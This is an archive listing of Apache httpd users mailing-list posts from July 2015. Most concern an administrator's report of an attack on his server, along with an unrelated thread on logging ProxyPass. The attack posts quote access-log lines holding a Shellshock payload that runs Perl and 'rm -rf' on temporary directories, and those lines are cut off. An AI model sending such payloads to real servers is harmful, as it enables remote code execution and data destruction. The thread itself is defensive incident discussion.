Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
"sc.gif" was executed. On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote: I guess that the 200 comes from the fact that apache simply delivered the /index.html page. Or did you find that "sc.gif" was transferred and executed? Kurt Bremser AMOS Austria Newton was wrong. There is no gr

Re: [users@httpd] Security question

2015-07-02 Thread Bremser, Kurt (AMOS Austria GmbH)
I guess that the 200 comes from the fact that apache simply delivered the /index.html page. Or did you find that "sc.gif" was transferred and executed? Kurt Bremser AMOS Austria Newton was wrong. There is no gravity. The Earth sucks. From: Victor Sterpu [vic...@ca

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
On 02.07.2015 17:55, Kurtis Rader wrote: On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu wrote: A hacker attacked an apache2 web server by HTTP injection. The log shows what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Yes. On 02.07.2015 21:16, David Grant wrote: Cgi module in php? Sent from my iPad On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: Hello A hacker attacked an apache2 web server by HTTP injection. The log shows what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_

Re: [users@httpd] Security question

2015-07-02 Thread David Grant
Cgi module in php? Sent from my iPad > On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: > > Hello > > A hacker attacked an apache2 web server by HTTP injection. > The log shows what he has done: > 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper > HTTP/1.1" 404 280 "-" "(

Re: [users@httpd] Security question

2015-07-02 Thread Kurtis Rader
On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu wrote: > A hacker attacked an apache2 web server by HTTP injection. > The log shows what he has done: > 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper > HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: > t

Re: [users@httpd] Security question

2015-07-02 Thread Eric Covener
On Thu, Jul 2, 2015 at 8:29 AM, Victor Sterpu wrote: > In the end the attack was successful. Log shows the last command: > 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" > "() { :;};/usr/bin/perl -e 'print \"Content-Type: > text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
In the end the attack was successful. Log shows the last command: 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; r

Re: [users@httpd] Security question

2015-07-02 Thread Yehuda Katz
It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful. - Y Sent from a gizmo with a very small keyboard and hyperactive autocorrect. On Jul 2, 2015 8:00 AM, "Victor Sterpu" wrote: > Hello

Re: [users@httpd] how to trace a proxypass directive

2015-07-02 Thread Aurélien Terrestris
If the logs still don't say anything, check if LoadModule proxy*** and rewrite are in the config. Instead of ProxyPass, you can use a RewriteRule with the P flag and this one is also supposed to log lots of things. 2015-07-02 10:35 GMT+02:00 Daniel : > LogLevel warn proxy:trace3 for 2.4.x > Loglev

[users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Hello A hacker attacked an apache2 web server by HTTP injection. The log shows what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/

Re: [users@httpd] how to trace a proxypass directive

2015-07-02 Thread Daniel
LogLevel warn proxy:trace3 for 2.4.x Loglevel debug for 2.2.x I would also make sure the proxypass directives are in the correct virtualhost, in case the requests are reaching another virtualhost different than the one where you defined the proxypass directives. Defining specific log files for dif